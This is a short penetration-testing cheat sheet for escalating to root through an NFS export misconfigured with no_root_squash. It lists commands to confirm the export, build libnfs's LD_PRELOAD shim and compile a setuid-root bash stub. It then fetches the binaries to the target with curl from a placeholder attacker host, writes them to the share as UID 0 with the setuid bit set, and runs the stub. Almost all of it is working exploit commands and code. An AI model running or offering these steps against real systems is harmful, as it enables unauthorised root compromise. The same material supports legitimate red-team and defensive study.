tcp/2049 NFS no_root_squash/no_all_squash misconfiguration PE

• Check vulnerability

> showmount -e 127.0.0.1
    Export list for 127.0.0.1:
    /srv/Share 127.0.0.1/32,10.1.1.0/24
> cat /etc/exports
    /srv/Share 10.1.1.0/24(insecure,rw)
    /srv/Share 127.0.0.1/32(`no_root_squash`,`insecure`,rw)

• Download exploit and compile: https://github.com/sahlberg/libnfs.git

> ./bootstrap
> ./configure
> make
> gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/

• create a simple exploit pwn.c and compile, gcc pwn.c -o pwn

int main(void){setreuid(0,0); sys tem("/bin/bash"); return 0;}

• Transfer the compiled example (i.e ld_nfs.so), exploit (i.e pwn) and another two libraries (i.e libnfs.so, libnfs.so.13) in the lib/.lib folder to the target

> curl http://<ip>/pwn --output pwn
> curl http://<ip>/ld_nfs.so --output ld_nfs.so
> curl http://<ip>/libnfs.so --output libnfs.so
> curl http://<ip>/libnfs.so.13 --output libnfs.so.13

• prepare the exploit and run

> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so cp pwn nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chown root: nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://127.0.0.1/srv/Share/pwn

> /srv/Share/pwn